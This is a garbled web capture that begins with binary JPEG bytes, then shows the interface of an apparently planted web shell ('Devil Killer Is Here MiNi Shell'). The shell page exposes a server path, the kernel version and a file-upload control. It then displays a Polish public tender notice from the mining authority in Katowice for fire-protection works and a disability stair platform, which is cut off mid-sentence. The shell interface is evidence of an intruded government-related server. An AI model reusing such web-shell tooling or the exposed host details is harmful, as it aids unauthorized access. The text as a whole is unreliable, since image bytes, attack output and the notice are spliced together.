JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250516/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250516/0023518501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane obejmujące wykonanie zabezpieczeń przeciwpożarowych oraz platformy schodowej dla osób niepełnosprawnych wraz z robotami towarzyszącymi. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wyższy Urząd Górniczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000332245</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poniatowskiego 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-055</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zakupy@wug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> nadzór górniczy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane obejmujące wykonanie zabezpieczeń przeciwpożarowych oraz platformy schodowej dla osób niepełnosprawnych wraz z robotami towarzyszącymi. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0f147f60-be4d-4fbd-bfe0-06ddac4017e2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00235185</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00060105/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Poprawa bezpieczeństwa pożarowego w budynku WUG przy ul. Poniatowskiego 31 w Katowicach.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wug.ezamawiajacy.pl/pn/wug/demand/211498/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym, a wykonawcami odbywa się wyłącznie przy<br/>użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy Pzp, za pośrednictwem elektronicznej platformy zakupowej<br/>dostępnej pod adresem: https://wug.ezamawiajacy.pl, zwanej dalej „platformą”.<br/>Tym samym z uwagi, iż zamawiający nie przewiduje innego sposobu komunikacji niż przy użyciu środków komunikacji<br/>elektronicznej, nie precyzuje informacji, o której mowa w art. 281 ust. 1 pkt 9 ustawy Pzp.<br/>Instrukcja dla wykonawcy w zakresie funkcji i obsługi platformy dostępna jest pod adresem:<br/><br/>https://wug.ezamawiajacy.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=publicFilesList&amp;clientName=wug&amp;USER_MENU_HOVER=publicFilesList.<br/><br/><br/>Natomiast w przypadku gdy powyższe hiperłącze nie będzie działać instrukcję można pobrać z platformy z zakładki „baza wiedzy”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ogólne zasady korzystania z platformy:<br/>a) zamawiający poprzez platformę zapewnia pełny, bezpośredni i nieograniczony dostęp do dokumentów postępowania,<br/>b) przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na platformie, ani logowania<br/>do platformy,<br/>c) do udziału w postępowaniu wymagane jest zalogowanie się wykonawcy do platformy, które odbywa się na subdomenie Wyższego<br/>Urzędu Górniczego; https://wug.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.<br/>d) wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”;<br/>e) rejestracja konta następuje automatycznie poprzez:<br/>- podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym), lub<br/>- kontakt z numerem telefonu podanym w potwierdzeniu, lub<br/>- jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu<br/>maksymalnie 6 godzin roboczych,<br/>f) zarejestrowanie i utrzymywanie konta na platformie oraz korzystanie z platformy jest bezpłatne,<br/>g) wykonawca w celu wyjaśnienie treści SWZ zwraca się z wnioskiem o wyjaśnienie treści SWZ do zamawiającego za pomocą<br/>platformy poprzez:<br/>• opcję „zadaj pytanie (dostęp nieograniczony), lub<br/>• przy użyciu zakładki „korespondencja” (dla użytkowników zarejestrowanych).<br/>Pytanie w opcji „zadaj pytanie” odbywa się klikając lewym przyciskiem myszy w ikonę „ZADAJ PYTANIE”. Powoduje to otwarcie<br/>okna, w którym należy uzupełnić dane wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z<br/>wymaganym kodem weryfikującym z obrazka wykonawca klika klawisz „POTWIERDŹ”, wykonawca uzyskuje potwierdzenie wysłania<br/>pytania poprzez komunikat systemowy &#34;pytanie wysłane&#34;,<br/>i) treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ, zamawiający<br/>udostępnia za pośrednictwem platformy,<br/>j) korespondencja oraz przekazywanie dokumentów odbywać się będzie za pośrednictwem platformy,<br/>k) niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie tj.:<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>- komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>- zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>- zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>l) dopuszczalne wielkości i formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt,<br/>docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z,<br/>html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>m) kodowanie i czas przekazania i odbioru danych:<br/>- plik załączony przez wykonawcę na platformie i zapisany, widoczny jest w systemie, jako zaszyfrowany – format kodowania UTF8.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez zamawiającego po upływie terminu otwarcia ofert.<br/>- oznaczenie czasu odbioru danych przez platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych jest Prezes Wyższego Urzędu Górniczego, 40- 055 Katowice, ul. Poniatowskiego 31.<br/>W sprawach związanych z ochroną danych osobowych można kontaktować się z Inspektorem Ochrony Danych za pośrednictwem poczty e-mail: iod@wug.gov.pl, telefonicznie 32 7361857 lub pisemnie na adres siedziby administratora: Inspektor Ochrony Danych, Wyższy Urząd Górniczy, 40-055 Katowice, ul. Poniatowskiego 31,<br/><br/>Ponadto odbiorcą osobowych będzie również spółka Otwarty Rynek Elektroniczny S.A. z siedzibą w Warszawie przy ulicy Domaniewskiej 49 (00-672 Warszawa), wpisana do Krajowego Rejestru Sądowego przez Sąd Rejonowy dla m. st Warszawy, XII<br/>Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS 0000041441 NIP 5262535153 REGON 017282436, jako<br/>właściciel Systemu, za pomocą którego zamawiający prowadzi postępowania o udzielenie zamówienia publicznego.<br/><br/>Dane osobowe będą przechowywane zgodnie z obowiązującą w Wyższym Urzędzie Górniczym Instrukcją Kancelaryjną i przepisami<br/>o archiwizacji dokumentów – kategoria B przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia.<br/><br/>Jednocześnie Zamawiający, informuje iż pełna treść klauzuli informacyjnej stanowi załącznik nr 1 do Specyfikacji Warunków<br/>Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BAG/06/2025/TP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane obejmujące wykonanie zabezpieczeń przeciwpożarowych oraz platformy schodowej dla osób niepełnosprawnych wraz z robotami towarzyszącymi w budynku biurowym Wyższego Urzędu Górniczego mieszczącym się przy ulicy Poniatowskiego 31 w Katowicach.<br/><br/>Przedmiot zamówienia obejmuje w szczególności:<br/>a)	wydzielenie pożarowe 2 klatek schodowych od poziomych dróg ewakuacyjnych,<br/>b)	podzielenie obiektu na 2 strefy pożarowe,<br/>c)	prace w zakresie stolarki i ślusarki budowlanej,<br/>d)	wyposażenie budynku w przeciwpożarowy wyłącznik prądu,<br/>e)	wykonanie instalacji wodociągowej przeciwpożarowej z przesunięciem hydrantów poza wydzielone klatki schodowe,<br/>f)	wyposażenie części okien na parterze i piętrze w kurtyny przeciwpożarowe w klasie odporności ogniowej EW 60, <br/>g)	wyposażenie kominków wentylacyjnych piwnicy w klapy przeciwpożarowe, <br/>h)	wyposażenie obiektu w system sygnalizacji pożaru: pełna ochrona całego budynku <br/>z przekazywaniem alarmu pożarowego do jednostki ratowniczo-gaśniczej PSP i centralki SSP, system instalacji oddymiającej w klatkach schodowych, system sygnalizacji świetlnej i akustycznej, sterowanie otwieraniem ewakuacyjnych drzwi napowietrzających, klap oddymiających, okna napowietrzającego oraz zamykaniem kurtyn okiennych i klap przeciwpożarowych, <br/>i)	wyposażenie poziomych oraz pionowych dróg ewakuacyjnych w awaryjne oświetlenie ewakuacyjne,<br/>j)	zabudowę platformy schodowej dla osób niepełnosprawnych w obrębie tylnej klatki schodowej wraz z podkuciem ścian i zabezpieczeniem konstrukcyjnym, wymianą drzwi zewnętrznych i montażem wideodomofonu.<br/><br/>3Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót stanowiące załącznik nr 2 do SWZ oraz projektowane postanowienia umowy, stanowiące załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">31625000-3 - Alarmy przeciwpożarowe</p> <p class="mb-0">31625200-5 - Systemy przeciwpożarowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45262700-8 - Przebudowa budynków</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Przedmiot zamówienia realizowany będzie w zakresie:<br/>1)	zamówienia podstawowego (część gwarantowana), w ramach którego wykonawca zobowiązany będzie do: <br/>- zabudowy platformy dla osób niepełnosprawnych w obrębie tylnej klatki schodowej wraz z robotami towarzyszącymi;<br/>- wykonania ścian oddzielenia przeciwpożarowego (ściany wydzielające klatki schodowe), montażu okna napowietrzającego, montażu stolarki i ślusarki budowlanej, montażu klap oddymiających oraz klap odcinających, adaptacji pomieszczenia rozdzielni elektrycznej;<br/>- wykonania oświetlenia awaryjnego i przeciwpożarowego wyłącznika prądu. <br/>2)	zamówienia objętego prawem opcji (część objęta prawem opcji), w ramach którego wykonawca zobowiązany będzie do:<br/>- wykonania systemu sygnalizacji pożaru i oddymiania;<br/>- montażu kurtyn przeciwpożarowych;<br/>- wykonania instalacji hydrantowej, zabezpieczenia przepustów instalacji sanitarnych istniejących oraz wbudowanej instalacji hydrantowej wraz z robotami towarzyszącymi. <br/><br/>Warunkiem skorzystania przez zamawiającego z prawa opcji będzie posiadanie środków finansowych na zamówienie objęte tym prawem. Zamawiający zastrzega sobie możliwość nieskorzystania lub skorzystania z prawa opcji w niepełnym zakresie. Warunkiem uruchomienia przez zamawiającego prawa opcji jest złożenie pisemnego oświadczenia woli o korzystaniu z prawa opcji z jednoczesnym wskazaniem zakresu. W przypadku nieskorzystania przez zamawiającego z prawa opcji, wykonawcy nie przysługują żadne roszczenia z tego tytułu. Skorzystanie z prawa opcji, tj. złożenie oświadczenia, o którym mowa powyżej, nastąpi najpóźniej do dnia 30 kwietnia 2026 roku. Postanowienia odnoszące się do części gwarantowanej przedmiotu zamówienia znajdują odpowiednie zastosowanie do części objętej prawem opcji. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">112 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena ofert będzie dokonywana według następujących kryteriów:<br/>- cena za realizację zamówienia podstawowego: znaczenie procentowe kryterium	50%	<br/>- cena za realizację zamówienia objętego prawem opcji: znaczenie procentowe kryterium	50%	<br/><br/>2.	Kryterium „cena za realizację zamówienia podstawowego” rozpatrywane będzie według zaoferowanej przez wykonawcę łącznej ceny brutto za realizację zamówienia podstawowego:<br/>Punkty będą liczone wg wzoru:<br/>	CP= (CP1/CP2) x 100% x 50<br/>	gdzie:<br/> CP – ilość punktów uzyskanych przez badaną ofertę,<br/>	CP1 – cena brutto oferty z najniższą ceną spośród ofert nieodrzuconych/ niepodlegających odrzuceniu,<br/>	CP2 – cena brutto oferty badanej.<br/>Wyliczenie punktów w zakresie powyższego kryterium zostanie dokonane z dokładnością do dwóch miejsc po przecinku zgodnie z matematycznymi zasadami zaokrąglania.<br/>3.	Kryterium „cena za realizację zamówienia objętego prawem opcji” rozpatrywane będzie według zaoferowanej przez wykonawcę łącznej ceny brutto za realizację zamówienia objętego prawem opcji:<br/>Punkty będą liczone wg wzoru:<br/>CO= (CO1/CO2) x 100% x 50<br/>	gdzie:<br/>	CO – ilość punktów uzyskanych przez badaną ofertę,<br/>	CO1 – cena brutto oferty z najniższą ceną spośród ofert nieodrzuconych/ niepodlegających odrzuceniu,<br/>	CO2 – cena brutto oferty badanej.<br/>Wyliczenie punktów w zakresie powyższego kryterium zostanie dokonane z dokładnością do dwóch miejsc po przecinku zgodnie z matematycznymi zasadami zaokrąglania<br/>4.	Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą ilość punktów w ww. kryteriach (łącznie).<br/>5.	W toku badania i oceny ofert zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym - zamawiający nie stawia warunku w powyższym zakresie;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów - zamawiający nie stawia warunku w powyższym zakresie;<br/>3)	sytuacji ekonomicznej lub finansowej - zamawiający nie stawia warunku w powyższym zakresie;<br/>4)	zdolności technicznej lub zawodowej:<br/>a)	w zakresie zdolności technicznej:<br/>wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał w sposób należyty <br/>co najmniej 2 zamówienia obejmujące wykonanie/montaż/instalację czynnych i biernych zabezpieczeń przeciwpożarowych, zawierających co najmniej jeden element czynnych zabezpieczeń przeciwpożarowych i co najmniej jeden element biernych zabezpieczeń przeciwpożarowych, każde z zamówień o wartości co najmniej 200 000 zł brutto.<br/>Poprzez czynne zabezpieczenia przeciwpożarowe zamawiający rozumie <br/>rozwiązania, które uruchamiają się natychmiast po wykryciu pożaru w budynku, np. system sygnalizacji pożaru (SSP), dźwiękowy system ostrzegawczy (DSO), system oddymiania, system detekcji gazów toksycznych i wybuchowych, oświetlenie awaryjne i ewakuacyjno- kierunkowe.<br/>Poprzez bierne zabezpieczenia przeciwpożarowe zamawiający rozumie <br/>rozwiązania mające na celu zwiększenie odporności elementów budynku <br/>i ograniczenie jego rozprzestrzeniania się, np. montaż przeciwpożarowych okien, drzwi, kurtyn, itp.<br/><br/>Uwaga: W przypadku podania wartości robót budowlanych w walutach innych niż wskazane przez zamawiającego, dla potwierdzenia spełniania warunku zamawiający dokona przeliczenia tej waluty na PLN według średniego kursu ogłoszonego przez NBP <br/>z dnia opublikowania ogłoszenia o zamówieniu w BZP. <br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy Pzp, warunek o którym mowa powyżej, musi zostać spełniony w całości przez minimum jednego z wykonawców lub podmiot, na 